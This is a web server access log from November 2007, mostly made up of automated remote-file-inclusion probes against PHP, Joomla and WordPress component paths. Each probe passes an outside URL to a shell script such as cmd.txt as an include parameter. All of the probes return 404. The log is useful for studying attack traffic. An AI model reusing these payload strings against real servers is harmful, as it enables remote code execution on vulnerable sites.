81.187.167.130 - - [25/Nov/2007:16:02:06 -0800] "GET /logs/access_071008.log//modules/agendax/addevent.inc.php?agendax_path=http://www.miedzyrzecz.org//components/com_akobook/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.187.167.130 - - [25/Nov/2007:16:02:06 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.miedzyrzecz.org//components/com_akobook/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.187.167.130 - - [25/Nov/2007:16:02:06 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.miedzyrzecz.org//components/com_akobook/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.187.167.130 - - [25/Nov/2007:16:03:04 -0800] "GET /logs/access_071105.log//modules/agendax/addevent.inc.php?agendax_path=http://www.miedzyrzecz.org//components/com_akobook/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.187.167.130 - - [25/Nov/2007:16:03:52 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.miedzyrzecz.org//components/com_akobook/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
204.200.195.148 - - [25/Nov/2007:16:04:29 -0800] "GET /logs/components/com_mospray/scripts/admin.php%22http://www.theranchjohnstown.com/calendar/theme/system/r8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
204.200.195.148 - - [25/Nov/2007:16:04:29 -0800] "GET /components/com_mospray/scripts/admin.php%22http://www.theranchjohnstown.com/calendar/theme/system/r8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
204.200.195.148 - - [25/Nov/2007:16:04:29 -0800] "GET /logs/components/com_mospray/scripts/admin.php%22http://www.theranchjohnstown.com/calendar/theme/system/r8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
204.200.195.148 - - [25/Nov/2007:16:04:29 -0800] "GET /components/com_mospray/scripts/admin.php%22http://www.theranchjohnstown.com/calendar/theme/system/r8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
217.172.33.99 - - [25/Nov/2007:16:05:38 -0800] "GET /logs/access.log/mcf.php?content=http://whited3vi7.helloweb.eu/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.172.33.99 - - [25/Nov/2007:16:05:39 -0800] "GET /mcf.php?content=http://whited3vi7.helloweb.eu/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.172.33.99 - - [25/Nov/2007:16:05:39 -0800] "GET /logs/mcf.php?content=http://whited3vi7.helloweb.eu/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.172.33.99 - - [25/Nov/2007:16:06:43 -0800] "GET /logs/access_071105.log/mcf.php?content=http://whited3vi7.helloweb.eu/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
204.200.195.148 - - [25/Nov/2007:16:07:43 -0800] "GET /logs/components/com_mospray/scripts/admin.php%22http://www.theranchjohnstown.com/calendar/theme/system/r8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
204.200.195.148 - - [25/Nov/2007:16:07:43 -0800] "GET /components/com_mospray/scripts/admin.php%22http://www.theranchjohnstown.com/calendar/theme/system/r8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
204.200.195.148 - - [25/Nov/2007:16:07:43 -0800] "GET /logs/components/com_mospray/scripts/admin.php%22http://www.theranchjohnstown.com/calendar/theme/system/r8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
204.200.195.148 - - [25/Nov/2007:16:07:43 -0800] "GET /components/com_mospray/scripts/admin.php%22http://www.theranchjohnstown.com/calendar/theme/system/r8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
217.172.33.99 - - [25/Nov/2007:16:09:59 -0800] "GET /logs/index.php?go=uid=100(apache)%20gid=500(apache)%20groups=500(apache)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.172.33.99 - - [25/Nov/2007:16:09:59 -0800] "GET /index.php?go=uid=100(apache)%20gid=500(apache)%20groups=500(apache)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.187.167.130 - - [25/Nov/2007:16:10:16 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.miedzyrzecz.org//components/com_akobook/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.187.167.130 - - [25/Nov/2007:16:10:17 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.miedzyrzecz.org//components/com_akobook/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
204.200.195.148 - - [25/Nov/2007:16:10:28 -0800] "GET /logs/components/com_mospray/scripts/admin.php%22http://www.theranchjohnstown.com/calendar/theme/system/r8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
204.200.195.148 - - [25/Nov/2007:16:10:28 -0800] "GET /logs/components/com_mospray/scripts/admin.php%22http://www.theranchjohnstown.com/calendar/theme/system/r8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
204.200.195.148 - - [25/Nov/2007:16:10:28 -0800] "GET /components/com_mospray/scripts/admin.php%22http://www.theranchjohnstown.com/calendar/theme/system/r8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
204.200.195.148 - - [25/Nov/2007:16:10:28 -0800] "GET /components/com_mospray/scripts/admin.php%22http://www.theranchjohnstown.com/calendar/theme/system/r8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
204.200.195.148 - - [25/Nov/2007:16:10:28 -0800] "GET /logs/components/com_mospray/scripts/admin.php%22http://www.theranchjohnstown.com/calendar/theme/system/r8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
204.200.195.148 - - [25/Nov/2007:16:10:28 -0800] "GET /logs/components/com_mospray/scripts/admin.php%22http://www.theranchjohnstown.com/calendar/theme/system/r8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
204.200.195.148 - - [25/Nov/2007:16:10:28 -0800] "GET /components/com_mospray/scripts/admin.php%22http://www.theranchjohnstown.com/calendar/theme/system/r8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
204.200.195.148 - - [25/Nov/2007:16:10:28 -0800] "GET /components/com_mospray/scripts/admin.php%22http://www.theranchjohnstown.com/calendar/theme/system/r8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
202.142.220.33 - - [25/Nov/2007:16:13:52 -0800] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://singocrew.biz/alat/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
202.142.220.33 - - [25/Nov/2007:16:13:52 -0800] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://singocrew.biz/alat/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.142.220.33 - - [25/Nov/2007:16:13:52 -0800] "GET //modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://singocrew.biz/alat/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
202.142.220.33 - - [25/Nov/2007:16:13:52 -0800] "GET //modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://singocrew.biz/alat/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
81.21.72.165 - - [25/Nov/2007:16:14:47 -0800] "GET /logs/access_071008.log//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.freewebtown.com/wiz83wiz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.21.72.165 - - [25/Nov/2007:16:14:47 -0800] "GET //modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.freewebtown.com/wiz83wiz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.21.72.165 - - [25/Nov/2007:16:14:48 -0800] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.freewebtown.com/wiz83wiz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.21.72.165 - - [25/Nov/2007:16:14:48 -0800] "GET /logs/access_071028.log//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.freewebtown.com/wiz83wiz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.21.72.165 - - [25/Nov/2007:16:14:54 -0800] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.freewebtown.com/wiz83wiz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.21.72.165 - - [25/Nov/2007:16:14:54 -0800] "GET //modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.freewebtown.com/wiz83wiz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
84.109.120.215 - - [25/Nov/2007:16:17:24 -0800] "GET /logs/access_070820.log HTTP/1.0" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "galf.org"
24.232.131.193 - - [25/Nov/2007:16:21:05 -0800] "GET /logs/access_070723.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
24.232.131.193 - - [25/Nov/2007:16:21:10 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
24.232.131.193 - - [25/Nov/2007:16:21:20 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
24.232.131.193 - - [25/Nov/2007:16:21:28 -0800] "GET /logs/access_070903.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
68.180.250.72 - - [25/Nov/2007:16:21:40 -0800] "GET /logs/access_070820.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
70.85.175.42 - - [25/Nov/2007:16:31:32 -0800] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://hotbuy.ws/shop/css/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
70.85.175.42 - - [25/Nov/2007:16:31:32 -0800] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://hotbuy.ws/shop/css/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.194.68.69 - - [25/Nov/2007:16:38:37 -0800] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://electro.lydo.org/rfi/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
216.194.68.69 - - [25/Nov/2007:16:38:37 -0800] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://electro.lydo.org/rfi/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
68.180.250.113 - - [25/Nov/2007:16:40:18 -0800] "GET /logs/access_071029.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
202.142.220.33 - - [25/Nov/2007:16:40:38 -0800] "GET /logs/access_071015.log//index.php?pag=http://singocrew.biz/alat/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.142.220.33 - - [25/Nov/2007:16:40:39 -0800] "GET //index.php?pag=http://singocrew.biz/alat/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.142.220.33 - - [25/Nov/2007:16:40:40 -0800] "GET /logs//index.php?pag=http://singocrew.biz/alat/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.142.220.33 - - [25/Nov/2007:16:41:27 -0800] "GET /logs/access_070820.log//index.php?pag=http://singocrew.biz/alat/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.142.220.33 - - [25/Nov/2007:16:43:25 -0800] "GET /logs/access_071014.log//index.php?pag=http://singocrew.biz/alat/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.142.220.33 - - [25/Nov/2007:16:43:26 -0800] "GET /logs/access_070806.log//index.php?pag=http://singocrew.biz/alat/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.142.220.33 - - [25/Nov/2007:16:43:27 -0800] "GET /logs/access_070730.log//index.php?pag=http://singocrew.biz/alat/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.142.220.33 - - [25/Nov/2007:16:43:42 -0800] "GET /logs/access_070826.log//index.php?pag=http://singocrew.biz/alat/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.142.220.33 - - [25/Nov/2007:16:43:46 -0800] "GET /logs/access_071008.log//index.php?pag=http://singocrew.biz/alat/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.142.220.33 - - [25/Nov/2007:16:43:57 -0800] "GET /logs/access_070910.log//index.php?pag=http://singocrew.biz/alat/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.142.220.33 - - [25/Nov/2007:16:44:02 -0800] "GET /logs/access_070723.log//index.php?pag=http://singocrew.biz/alat/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.142.220.33 - - [25/Nov/2007:16:44:02 -0800] "GET /logs/access_070924.log//index.php?pag=http://singocrew.biz/alat/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.142.220.33 - - [25/Nov/2007:16:44:29 -0800] "GET /logs/access_070827.log//index.php?pag=http://singocrew.biz/alat/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
202.142.220.33 - - [25/Nov/2007:16:44:34 -0800] "GET /logs/access_071028.log//index.php?pag=http://singocrew.biz/alat/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.142.220.33 - - [25/Nov/2007:16:44:35 -0800] "GET /logs/access_070903.log//index.php?pag=http://singocrew.biz/alat/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.142.220.33 - - [25/Nov/2007:16:44:35 -0800] "GET /logs/access_071022.log//index.php?pag=http://singocrew.biz/alat/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.142.220.33 - - [25/Nov/2007:16:44:41 -0800] "GET /logs/access_071001.log//index.php?pag=http://singocrew.biz/alat/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.142.220.33 - - [25/Nov/2007:16:46:22 -0800] "GET /logs/access.log//index.php?pag=http://singocrew.biz/alat/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.142.220.33 - - [25/Nov/2007:16:48:47 -0800] "GET /logs/access_070604.log//index.php?pag=http://singocrew.biz/alat/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.27.170.146 - - [25/Nov/2007:16:48:58 -0800] "GET /cendoc.php HTTP/1.1" 404 275 "http://www.lesbianas.tv/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5" "www.galf.org"
200.27.170.146 - - [25/Nov/2007:16:48:59 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5" "www.galf.org"
212.227.97.129 - - [25/Nov/2007:16:49:17 -0800] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.hgbruce.com/components/com_rsgallery/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.227.97.129 - - [25/Nov/2007:16:49:18 -0800] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.hgbruce.com/components/com_rsgallery/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.142.220.33 - - [25/Nov/2007:16:52:37 -0800] "GET /contrib/mx_glance_sdesc.php?mx_root_path=http://richbox1.net/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.142.220.33 - - [25/Nov/2007:16:52:56 -0800] "GET /logs/access_070917.log//index.php?pag=http://singocrew.biz/alat/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.179.126.38 - - [25/Nov/2007:16:57:11 -0800] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.miedzyrzecz.org//components/com_akobook/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
212.14.5.156 - - [25/Nov/2007:16:57:51 -0800] "GET /logs/access_071008.log//components/com_forum/download.php?phpbb_root_path=http://218.ams.edu.pl/e107_themes/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.14.5.156 - - [25/Nov/2007:16:57:51 -0800] "GET //components/com_forum/download.php?phpbb_root_path=http://218.ams.edu.pl/e107_themes/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.172.33.99 - - [25/Nov/2007:16:58:35 -0800] "GET /logs/access_070625.log/p.php?p=http://whited3vi7.helloweb.eu/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.172.33.99 - - [25/Nov/2007:16:58:35 -0800] "GET /p.php?p=http://whited3vi7.helloweb.eu/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.172.33.99 - - [25/Nov/2007:16:58:35 -0800] "GET /logs/p.php?p=http://whited3vi7.helloweb.eu/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.172.33.99 - - [25/Nov/2007:16:59:19 -0800] "GET /logs/access_070917.log/p.php?p=http://whited3vi7.helloweb.eu/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.187.167.130 - - [25/Nov/2007:16:59:33 -0800] "GET /logs/access_070910.log//modules/agendax/addevent.inc.php?agendax_path=http://www.miedzyrzecz.org//components/com_akobook/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
68.180.250.107 - - [25/Nov/2007:17:01:23 -0800] "GET /logs/access_070924.log HTTP/1.0" 200 655360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
205.234.252.231 - - [25/Nov/2007:17:01:24 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.252.231 - - [25/Nov/2007:17:01:24 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.6.22.153 - - [25/Nov/2007:17:01:40 -0800] "GET /logs/access_070716.log HTTP/1.0" 200 983040 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.22.153 - - [25/Nov/2007:17:05:25 -0800] "GET /logs/access_070917.log HTTP/1.0" 200 786432 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
217.172.33.99 - - [25/Nov/2007:17:06:08 -0800] "GET /logs/access_070625.log/site.php?table=http://whited3vi7.helloweb.eu/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.172.33.99 - - [25/Nov/2007:17:06:08 -0800] "GET /site.php?table=http://whited3vi7.helloweb.eu/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.172.33.99 - - [25/Nov/2007:17:06:08 -0800] "GET /logs/site.php?table=http://whited3vi7.helloweb.eu/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.172.33.99 - - [25/Nov/2007:17:06:57 -0800] "GET /logs/access_070924.log/p.php?p=http://whited3vi7.helloweb.eu/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.172.33.99 - - [25/Nov/2007:17:06:57 -0800] "GET /p.php?p=http://whited3vi7.helloweb.eu/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.172.33.99 - - [25/Nov/2007:17:06:57 -0800] "GET /logs/p.php?p=http://whited3vi7.helloweb.eu/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.172.33.99 - - [25/Nov/2007:17:07:00 -0800] "GET /logs/access_070820.log/p.php?p=http://whited3vi7.helloweb.eu/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.172.33.99 - - [25/Nov/2007:17:07:23 -0800] "GET /logs/access_070917.log/site.php?table=http://whited3vi7.helloweb.eu/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.179.126.38 - - [25/Nov/2007:17:07:23 -0800] "GET /logs/access_071014.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.miedzyrzecz.org//components/com_akobook/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.179.126.38 - - [25/Nov/2007:17:07:23 -0800] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://www.miedzyrzecz.org//components/com_akobook/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.92.87.154 - - [25/Nov/2007:17:08:18 -0800] "GET //modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.pciusacorp.com/_vti_var/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.106.179.153 - - [25/Nov/2007:17:09:25 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.106.179.153 - - [25/Nov/2007:17:09:25 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.22.153 - - [25/Nov/2007:17:11:33 -0800] "GET /logs/access_071022.log HTTP/1.0" 200 917504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
204.92.87.154 - - [25/Nov/2007:17:11:41 -0800] "GET /logs/access_070625.log//modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.pciusacorp.com/_vti_var/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.92.87.154 - - [25/Nov/2007:17:11:41 -0800] "GET /logs//modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.pciusacorp.com/_vti_var/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.92.87.154 - - [25/Nov/2007:17:11:44 -0800] "GET /logs/access_071014.log//modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.pciusacorp.com/_vti_var/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.142.220.33 - - [25/Nov/2007:17:12:06 -0800] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://richbox1.net/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.142.220.33 - - [25/Nov/2007:17:12:06 -0800] "GET //modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://richbox1.net/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.87.131.189 - - [25/Nov/2007:17:15:13 -0800] "GET //components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://tunes4toys.com/skins/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
80.87.131.189 - - [25/Nov/2007:17:15:13 -0800] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://tunes4toys.com/skins/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.118.102.179 - - [25/Nov/2007:17:16:52 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cameronmorgan.co.uk/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.118.102.179 - - [25/Nov/2007:17:16:53 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cameronmorgan.co.uk/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
205.234.252.231 - - [25/Nov/2007:17:17:34 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.252.231 - - [25/Nov/2007:17:17:34 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
83.143.84.3 - - [25/Nov/2007:17:23:41 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.lolz.kit.net/safe/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
83.143.84.3 - - [25/Nov/2007:17:23:41 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.lolz.kit.net/safe/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.29.16.18 - - [25/Nov/2007:17:24:53 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
72.29.16.18 - - [25/Nov/2007:17:24:53 -0800] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
72.29.16.18 - - [25/Nov/2007:17:25:29 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "galf.org"
72.29.16.18 - - [25/Nov/2007:17:25:30 -0800] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://intranet.stantonmortgage.com/modules/admin/bersama/doc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "galf.org"
208.179.126.38 - - [25/Nov/2007:17:27:33 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.miedzyrzecz.org//components/com_akobook/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.179.126.38 - - [25/Nov/2007:17:27:34 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.miedzyrzecz.org//components/com_akobook/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
83.201.30.3 - - [25/Nov/2007:17:28:31 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://dark-unknown.t35.com/cmd.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
83.201.30.3 - - [25/Nov/2007:17:28:32 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://dark-unknown.t35.com/cmd.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
67.19.124.18 - - [25/Nov/2007:17:28:57 -0800] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/4.0" "www.galf.org"
74.6.22.10 - - [25/Nov/2007:17:30:05 -0800] "GET /labia/?N=D HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
